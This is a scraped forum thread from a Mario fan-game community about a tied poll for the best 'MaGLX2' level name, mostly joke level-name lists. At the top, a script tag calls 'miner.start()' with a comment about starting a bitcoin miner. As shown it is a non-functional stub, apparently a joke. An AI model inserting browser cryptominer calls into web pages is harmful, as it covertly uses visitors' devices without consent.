<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

Best MaGLX2 Level Name (TIED, PLEASE VOTE IN POLL)

Kept you waiting HUH

Which is the best level name?

Poll ended at 3 years ago

You Can't Handle The Youth
68%
C'mon! C'MON! Daahh! Fart! Peanuts! Crackerjack! ALL THE FOOD YOU CAN FIND! YOU CAN PUT IT IN YOUR MOUTH, AND DIGEST IT!
32%

Total votes: 28

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Re: Best MaGLX2 Level Name

Postby Zha Hong Lang » 3 years ago

NO

NO

I HATE THIS THREAD AND I WILL RIP IT IN HALF AND WATCH GUSHING RED COME OUT OF IT

ORORWUNIRNJKSNF

OH NO! WHAT'S GOING ON WITH ME! I'm ACORN AND I'M DEAD!: 3
??????? ????? ?????:
take one toad by mouth daily:
Wow! fat guys surrounded by fat guy:
Everyone's a winner in the book of the dead! It's just that the prize is pretty terrible:
You Can't Handle the Youth:
Hey Everybody, This is Toad and I'm Playing the Latest Romhack 'Unbecoming Link'! The Greatest Revolution in SMBX Level Design Has Been My Use of Piranga Plant in this Typical Canada Level Right Now. My Handling of Blurp in the Massive Keep is Simply Art. You Just Don't Get It. There's Just Enough Gigantic Creepy Banzai Bills. I Guess Satan is Colour Blind:
C'mon! C'MON! Daahh! Fart! Peanuts! Crackerjack! ALL THE FOOD YOU CAN FIND! YOU CAN PUT IT IN YOUR MOUTH, AND DIGEST IT!:
Ooh, Ogre Trainee War. What Be Saloon's Stage Babe? Mah General Quarry Boy Gluing No Bloop Birds.:
Behold! There is a Milk Regret!:
Sheik's Mouth:
Conlusions Do Not Come From the Lake. Where the Heck Were You Raised To Think That? They Come From the Skies:

Oh no a tie between C'mon! C'MON! Daahh! Fart! Peanuts! Crackerjack! ALL THE FOOD YOU CAN FIND! YOU CAN PUT IT IN YOUR MOUTH, AND DIGEST IT! and You Can't Handle the Youth though the second actually isn't that bad really

:arrow: :idea:

:cry: :evil: :shock: :!: :oops: :monstrosity:
(Formerly Jayoshi)

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Re: Best MaGLX2 Level Name (TIED, PLEASE VOTE IN POLL)

Postby Zha Hong Lang » 3 years ago

To cut back on ties, I'm gonna open up a poll for each most which had a tied vote. The poll lasts only for today.
(Formerly Jayoshi)

Return to “Talkhaus Mosts 2015”